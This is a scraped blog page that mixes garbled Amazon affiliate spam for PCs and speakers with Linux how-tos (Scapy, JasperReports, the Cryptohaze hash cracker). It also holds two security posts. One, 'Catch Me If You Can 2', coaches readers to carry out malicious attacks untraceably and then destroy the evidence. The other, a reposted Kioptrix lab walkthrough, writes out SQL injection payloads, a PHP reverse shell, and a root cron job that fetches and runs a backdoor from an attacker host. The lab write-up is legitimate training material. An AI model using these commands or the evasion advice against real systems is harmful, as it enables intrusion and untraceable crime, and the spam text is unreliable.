Personal pc Discount Hewlett Packard Commercial PCs HP Smart Buy 6300 Pro 2 8GHz Pentium

Inexpensive Hewlett Packard Commercial PCs HP Smart Buy 6300 Pro: 2.8GHz Pentium Motivate it These days

Evaluations: Hewlett Packard Commercial PCs HP Smart Buy 6300 Pro: 2.8GHz Pentium

Hewlett Packard Commercial PCs HP Smart Buy 6300 Pro: 2.8GHz Pentium

Hewlett Packard Commercial PCs HP Smart Buy 6300 Pro: 2.8GHz Pentium Understand it Now

Color=#003366>windows 7 Professional 32 (available Through Downgrade Rights From Windows 8 Pro) 240w Active Pfc power Supply Intel Pentium Core G640 Dual Core (2.80 Ghz, 3MB Cache, 2 Cores) Intel Q75 Express 2GB (1x2GB) Ddr3 1600 Mhz 250GB Sata 3.0 1st Hard Drive Integrated Intel Hd Graphics HP Dvd-ROM Drive HP ps/2 Standard Keyboard HP Ps/2 optical Mouse Integrated High Definition Audio With Realtek Alc221 Codec Integrated Intel 82579lm Gigabit Network Connection 3 Years Parts, Labor And Onsite Service (3/3/3) Standard Warranty. Certain Restrictions And Exclusions Apply.

Read more »
Read More..

Microlab 1 5W USB 2 0 Speaker


Microlab 1 5W USB 2 0 Speaker



Microlab 1 5W USB 2 0 Speaker is one of the bestseller product in the market today. People arround United Kingdom is looking for Microlab 1 5W USB 2 0 Speaker with low prices from Internet. If youre lucky you can get a special discount from Amazon, only in this month. Well, good product that comes with low prices is everyone choices.

On sale now at affordable price, special discounts and super shipping. Im really satisfied with the qualities and highly recommend it to someone wanting for a top quality item with the newest features at an cheap. You can read testimony from buyers to find out more through their experience. Microlab 1 5W USB 2 0 Speaker has worked wonders for me and I wish it will do wonders on you too. So why spend much more time? Enjoy yourself, you know where to shop the best ones.

Most of the customer reviews speak that the Microlab 1 5W USB 2 0 Speaker are splendid luggage. Also, It Is a pretty well product for the price. It’s great for colony on a tight budget. We’ve found pros and cons on this type of product. But overall, It’s a supreme product and we are well recommend it! When you however want to know more details on this product, so read the reports of those who have already used it.




Microlab 1 5W USB 2 0 Speaker is a good choice with brand new features that will make you amaze. But if you still want to have another information about Microlab 1 5W USB 2 0 Speaker, you can read more detail information, spesification, and reviews from people that bought Microlab 1 5W USB 2 0 Speaker below.

Microlab 1 5W USB 2 0 Speaker Detail Information :



This Page is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.co.uk
CERTAIN CONTENT THAT APPEARS ON THIS SITE COMES FROM AMAZON SERVICES LLC. THIS CONTENT IS PROVIDED "AS IS" AND IS SUBJECT TO CHANGE OR REMOVAL AT ANY TIME.

Read More..

Bug Fix Bugtraq 2 Black Widow Final Gnome

Bugtraq 2 Black Widow Final builds on Ubuntu, Debian and OpenSuse. Each distribution comes with XFce, Gnome and KDE Window Manager. They all also come with 32-bit and 64-bit. A total of 18 copies that the Bugtraq Team needs to maintain.



I downloaded Ubuntu Gnome 32-bit and 64-bit version as I like Gnome Classic very much. After boot up, you need to set "Session" to "Gnome Classic" from the login screen of the Live DVD. The username is "bugtraq" and the password is "123456". The installation program is situated at "Applications -- System Tools -- Administration -- Install RELEASE" on 32-bit version. The installation program for 64-bit is on the Desktop.



The installation on my Parallels (Mac OS X Virtualization program) is smooth. I suggest you to select to download the update and 3rd party programs when install. For the first login of the installed copy, you need to set the "Session" to "Gnome Classic" and also makes it to default.



Bugtraq 2 comes with Services Administrator GUI and Databases GUI as well as Conky. However, there are some bugs on those programs. I am now going to fix it. The 2 GUI are situated at "Applications -- System Services".



I prepared a auto-run script to fix the bugs on the those programs and you can download it at here. It works well on 32-bit and 64-bit Ubuntu Gnome version.



The bugfix script is intended to fix the bugs on the Sagui and DBgui. However, it also fix some minor bugs on Conky. Be keep in mind that the official Conky is written for wireless device (wlan0) while my bugfix script is also written for wlan0. If you are using ethernet device, you need to change the "wlan0" to "eth0" (or any device that fits) on the "+.conkyrc" and "proxys.conf" scripts in the "bugtraq-2-gnome-x32-bugix" directory. Make sure you change it before running the bugfix script. In addition, the script will install some missing packages too.



WARNING : This bugfix script may damage your system or computer. You take care of the risk while using it.



Extract it with the following command :



tar -xvzf bugtraq-2-gnome-x32-bugfix.tar.gz



To run it :



cd bugtraq-2-gnome-x32-bugfix

./auto-bugfix.sh




UPDATE



The auto-run script has been updated for minor bug fix on Conky script, you can download at here







Thats all! See you.



Read More..

Logitech S220 2 1 Speaker System with Subwoofer

Logitech S220 2.1 Speaker System with Subwoofer Review




Logitech S220 2.1 Speaker System with Subwoofer



Logitech S220 2.1 Speaker System with Subwoofer Feature


  • 17 Watts RMS; 34 Watts Peak Power




"Buy Logitech S220 2.1 Speaker System with Subwoofer" Overview


The new Logitech S-220 Speaker System contains several upgrades to its predecessor, the S-200 Speaker System. Unlike the S-200, the new S-220 encompasses increased usability with a newly styled control base to manage improved acoustics, volume and VoIP connectivity. Bass tuning by the end user is often permanent once a setting is established. With the end-user experience at the forefront of Logitechs design strategy to minimize desk clutter the S-220 bass control is located directly on the subwoofer. This allows the end user to tune the speaker system with no concerns for any accidental control adjustments. Finally, the newly designed S-220 advantages improved acoustics for a smoother, rich experience to enjoy music, VoIP discussions or playing video games.You will not be disappointed with Logitech S220 2.1 Speaker System with Subwoofer






Related Products




For more INFORMATION


....Check price...Product Rating..Customer Reviews











Read More..

Catch Me If You Can 2

Last year, I was talking about how to use 3G/4G pre-paid SIM card to do malicious things. The full article is here. However, many countries required to register the buyers personal particulars when they purchase 3G/4G pre-paid SIM card. Today, I will introduce another method that you can use wired or mobile network to do malicious things untraceable.



First of all, you need a virtual machine (VMWare, VirtualBox or Parallels, etc) or a standalone computer. A router when you are connecting to the internet in wire. Otherwise, a pocket 3G/4G WiFi router is a must for mobile connection.



I prefer virtual machine if you have a suitable hardware (for example, more than 4GB RAM and a large hard drive or SSD).



Secondary, you need to install Ubuntu Server 12.04 LTS (x86 or x86_64) with openssh installed on the virtual machine (or a standalone computer if your prefer).



Thirdly, after installed Ubuntu server 12.04 LTS, you need to install NightHawk. Make sure your MAC address of the network interface (NIC) is changed or customized by macchanger. I recommended not to use the default MAC address even you are using virtual machine.



Fourthly, you connect to the virtual machine (NightHawk) with PPTP VPN and then you can do everything (including maliciously) untraceable. Make sure you change the DNS to others (not your real ISP) in your host computer (PPTP setting).



Finally, if you are using Kali Linux, you can install the VPN client as the following :



apt-get install network-manager-pptp-gnome network-manager-pptp

/etc/init.d/network-manager restart




For the setup of NightHawk, please refer to here.



Two things you should remember, one is to change the MAC address of the NIC at virtual machine; and the other is to change the DNS entries of PPTP configuration. By the way, do NOT use reverse connection or you need to use hidden services (I am not tried yet). Javascript and Flash should be disabled on browser too. Otherwise, you will be traced.



Final thought, after the successful and amazing malicious attack, you can securely and completely delete the virtual machine. In addition, you are recommended to fully encrypt your Kali Linux box and implement the self-destruction. Then, you can destroy your Kali Linux box with "nuke" passphrase in case you are being caught. Nice?



Thats all! See you.

Read More..

HOWTO Scapy 2 2 0 on Ubuntu 12 04 LTS

To install Scapy



sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot




To run Scapy interactively



sudo scapy



The scapy shell will be displayed :


WARNING: No route found for IPv6 destination :: (no default route?)

Welcome to Scapy (2.2.0)

>>>




To quit Scapy



>>>quit()


Thats all! See you.
Read More..

JasperReports 5 0 tutorial with iReport 5 0 part 2



The part 1 was a comprehensive beginner style  Jasper Reports tutorial. This extends that to demonstrate how to pass parameters via a Map using name/value pairs to the Jasper Reports.


Step 1: Add a new custom parameter named "footerText" to display some value in the page footer section. Right-click on "Parameters" and select "Add Parameter" and then rename it to "footerText" as shown below. Also, note than the Text Field in the page footer is mapped to $P{footerText} by right clicking on the "Text Field" and then select "Edit expression" to select the parameter "footerText" from the list.





Step 2: Compile this to the jrxml file and then you can pass the value for "footerText" via Java as shown below in the Main.java file. Take note of the getParameters( ) method.

package com.mycompany.app.jasper; import java.io.IOException; import java.io.InputStream; import java.util.Collection; import java.util.LinkedList; import java.util.List; import net.sf.jasperreports.engine.JRException; import net.sf.jasperreports.engine.JasperCompileManager; import net.sf.jasperreports.engine.JasperFillManager; import net.sf.jasperreports.engine.JasperPrint; import net.sf.jasperreports.engine.JasperReport; import net.sf.jasperreports.engine.data.JRBeanCollectionDataSource; import net.sf.jasperreports.engine.design.JasperDesign; import net.sf.jasperreports.engine.xml.JRXmlLoader;
package com.mycompany.app.jasper;

import java.io.IOException;
import java.io.InputStream;
import java.util.Collection;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;

import net.sf.jasperreports.engine.JRException;
import net.sf.jasperreports.engine.JasperCompileManager;
import net.sf.jasperreports.engine.JasperFillManager;
import net.sf.jasperreports.engine.JasperPrint;
import net.sf.jasperreports.engine.JasperReport;
import net.sf.jasperreports.engine.data.JRBeanCollectionDataSource;
import net.sf.jasperreports.engine.design.JasperDesign;
import net.sf.jasperreports.engine.xml.JRXmlLoader;
import net.sf.jasperreports.view.JasperViewer;

public class Main
{

public static JasperDesign jasperDesign;
public static JasperPrint jasperPrint;
public static JasperReport jasperReport;
public static String reportTemplateUrl = "person-template.jrxml";

public static void main(String[] args) throws IOException
{
try
{
InputStream resourceAsStream = Thread.currentThread().getContextClassLoader()
.getResourceAsStream(reportTemplateUrl);
//get report file and then load into jasperDesign
jasperDesign = JRXmlLoader.load(resourceAsStream);
//compile the jasperDesign
jasperReport = JasperCompileManager.compileReport(jasperDesign);
//fill the ready report with data and parameter
jasperPrint = JasperFillManager.fillReport(jasperReport, getParameters(),
new JRBeanCollectionDataSource(
findReportData()));
//view the report using JasperViewer
JasperViewer.viewReport(jasperPrint);
}
catch (JRException e)
{
e.printStackTrace();
}
}

private static Collection findReportData()
{
//declare a list of object
List<Person> data = new LinkedList<Person>();
Person p1 = new Person();
p1.setFirstName("John");
p1.setSurname("Smith");
p1.setAge(Integer.valueOf(5));
data.add(p1);
return data;
}

private static Map<String, Object> getParameters()
{
Map<String, Object> params = new HashMap<String, Object>();
params.put("footerText", "Just to demonstrate how to pass parameters to report");
return params;
}

}


Step 3: Finally, run the Main.java to see the value "Just to demonstrate how to pass parameters to report" in the report footer. The parameters are handy to pass any arbitary name/value pairs to the report.





Read More..

HOWTO Cryptohaze Multiforcer on 2 nVidia GeForce GTX 590 and Intel i7 3930K

The Cryptohaze Multiforcer is a high performance CUDA password cracker that is designed to target large lists of hashes. Performance holds very solid with large lists, such that on a suitable server, cracking a list of 1 000 000 passwords is not significantly slower than cracking a list of 10. For anyone who deals with large lists of passwords, this is a very useful tool! Algorithm support includes MD5, NTLM, LM, SHA1, and many others. The official website of Cryptohaze Multiforcer is here.



Download Cryptohaze-Linux_x64_1_30.tar.bz2



tar -xjvf Cryptohaze-Linux_x64_1_30.tar.bz2



cd Cryptohaze-Linux



nano single_charset



Append the following :



ABCEDFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_+|}{":?><`-=][;/.,



Cracking the sample SHA1 hashes on my two nVidia GeForce GTX 590 system :



./Cryptohaze-Multiforcer -h SHA1 -f test_hashes/Hashes-SHA1-Full.txt -c single_charset --threads 512 --blocks 512 -m 500



Hardware Configuration :



CPU : Intel i7-3930K (12 cores with Hyper-Threading, Socket 2011)

Motherboard : ASUS SaberTooth X79

RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)

Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2

Hard Drive : Seagate SATA II 1TB x 2

Power Supply : Seasonic X-series 1250W

CPU Heat Sink : Corsair H100 Liquid CPU Cooler

Case : Corsair Graphite Series 600T Black



Remarks :



Installation of CUDA on Back|Track 5 R1



Thats all! See you.



Read More..

HOWTO Kioptrix Level 1 2

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to : g0tmi1k



This is g0tmi1ks work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.



The original post at here



Links



Watch video on-line

Download video



Brief Overview



Its time for round 3 with Kioptrixs "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.



The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.



Method



Scanned network for the host (nmap)

Added IP address to the host file

Port scanned the host (unicornscan)

Banner grabbed the services running on the open ports (nmap)

Discovered usernames via a Local File Inclusion vulnerability (Firefox)

Enumerated database (manual MySQL injection)

Reused credentials granting a remote shell

Poorly configured setting to escape privileges (Unprotected limited root access)

Uploaded and used a web backdoor (Meterpreter)

Automated MySQL Injection (SQLMap)

Alternative method to gain root as well as escaping privileges (Cron Job)



What do I need?



Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)

A virtual machine (Example: Virtual Box or VMware Player)

Nmap – (Can be found on BackTrack 5).

Unicornscan – (Can be found in BackTrack 5s repository).

Exploit-DB – (Can be found on BackTrack 5).

John The Ripper – (Can be found on BackTrack 5).

SQLMap – (Can be found on BackTrack 5).

Metasploit – (Can be found on BackTrack 5).



Walkthrough



The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.



Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).



Afterwards the attacker executes a TCP & UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).



The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".



One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.



After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".



When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.



The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferrets password is "starwars" and dregs is "Mast3r".



A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.



After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.



With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...



Game over



Because the attacker doesnt wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.



By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.



(Editors note: This stage isnt "needed", it was only done to show how automated tools simplify the whole process!)



The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.



After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isnt able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isnt able switch users. But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.



Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.



Game over...again



Commands



nmap 192.168.0.* -n -sn -sP

echo 192.168.0.10 kioptrix3.com >> /etc/hosts # Its in the readme

cat /etc/hosts

us -H -msf -Iv kioptrix3.com -p 1-65535 && us -H -mU -Iv kioptrix3.com -p 1-65535

nmap -p 1-65535 -T4 -A -v kioptrix3.com

firefox kioptrix3.com # Link-> Blog

http://kioptrix3.com/../etc/passwd.html

# Gallery --> Source code (gadmin): http://kioptrix3.com/gallery/gadmin/

cd /pentest/exploits/exploitdb

grep -i gallarific files.csv

cat platforms/php/webapps/15891.txt

firefox kioptrix3.com/gallery/gallery.php

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=dev_accounts),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6

echo -e "0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d0 9794d8f021f40f0e" >> /tmp/hashes

cd /pentest/passwords/john

./john /tmp/hash --format=raw-md5

ssh loneferret@kioptrix3.com # starwars

id

pwd

ls -lA

cat CompanyPolicy.README

ls -lh /etc/sudoers

cat /etc/sudoers

sudo ht # starwars File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save

sudo su # starwars

id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

cd /etc/apache2/sites-enabled

ls

cat * | grep -i documentroot

exit

exit

firefox

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=gallarific_users),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6

cd /pentest/database/sqlmap

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" -f -b --current-user --is-dba --dbs

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --users --passwords

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --file-read="/etc/passwd"

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump

http://kioptrix3.com/gallery/gadmin # admin n0t7t1k4 Upload new pic

cd /pentest/backdoors/web/webshells

ls -lAh

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg # msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 R

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E

firefox http://kioptrix3.com/gallery/photos/home/www/kioptrix3.com/gallery/photos/w835623l98.jpg.html

sysinfo

shell

su loneferret

echo "import pty; pty.spawn(/bin/bash)" > /tmp/shell.py

python /tmp/shell.py

su loneferret # starwars

sudo su # starwars

cd ~

ls

cat Congrats.txt

exit

exit

exit

exit

exit

ssh loneferrt@kioptrix3.com # starwars

cat CompanyPolicy.README

sudo ht

* * * * * root cd /tmp; wget 192.168.0.192/back.door && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit # /etc/cron.d/exploit

msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 X > /var/www/back.door

file /var/www/back.door

/etc/init.d/apache2 start

msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E

id

uname -a




Notes



- Editing the host file is mentioned in the README which is included (as well as on the blog post).



Thats all! See you.
Read More..

HOWTO Flash Aid 2 2 3 for Ubuntu

Do you encounter blue faces or wrong colour displayed on the YouTube videos on your Ubuntu 12.04 box? If yes, I recommend you to install Flash-Aid which can solve the problem.



Open your Firefox and go to here to install the plugin. Once the plugin is installed, you can click on the icon on the right top hand corner to install the correct Flash.



The official wording of Flash-Aid :



Remove conflicting flash plugins from Ubuntu/Debian Linux systems, install the appropriate version according to system architecture and apply some tweaks to improve performance and fix common issues.



Thats all! See you.



UPDATED on May 23, 2012 :



If your problem is still there and you have nVidia display card with "libvdpau1" installed, you should follow the steps below to solve the problem.



sudo add-apt-repository ppa:tikhonov/misc

sudo apt-get update

sudo apt-get install libvdpau1




This solution is workable on Ubuntu 12.04 LTS with flashplugin-installer 11.2.202.235ubuntu0.12.04.1 but not with Flash-Aid 2.2.3.

Read More..

Blog Archive

Powered by Blogger.